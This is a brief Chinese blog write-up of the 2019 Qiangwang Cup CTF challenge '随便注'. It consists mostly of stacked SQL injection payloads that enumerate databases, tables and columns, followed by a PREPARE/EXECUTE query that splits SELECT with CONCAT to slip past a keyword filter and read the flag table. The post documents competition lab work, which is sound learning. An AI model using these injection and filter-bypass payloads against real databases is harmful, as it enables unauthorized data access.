[强网杯 2019]随便注

玉兰 好物分享

 

1';# 

1';show databases;#
0';show databases;#

 

0';show tables;#

 

0'; show columns from `1919810931114514`; #
反单引号 ` 把纯数字的表包起来

 

SET @b = xxxx                     设置变量@b为xxxx CONCAT('a','b')                     将a,b内容进行拼接 PREPARE a FROM @b;       定义预处理语句将预处理语句说明为a EXECUTE a;                         执行预处理语句
0';SET @b=CONCAT('SEL','ECT flag FROM `1919810931114514`;');PREPARE a FROM @b;EXECUTE a;

 

[强网杯 2019]随便注最先出现在Python成神之路

版权声明:
作者:玉兰
链接:https://www.techfm.club/p/17611.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>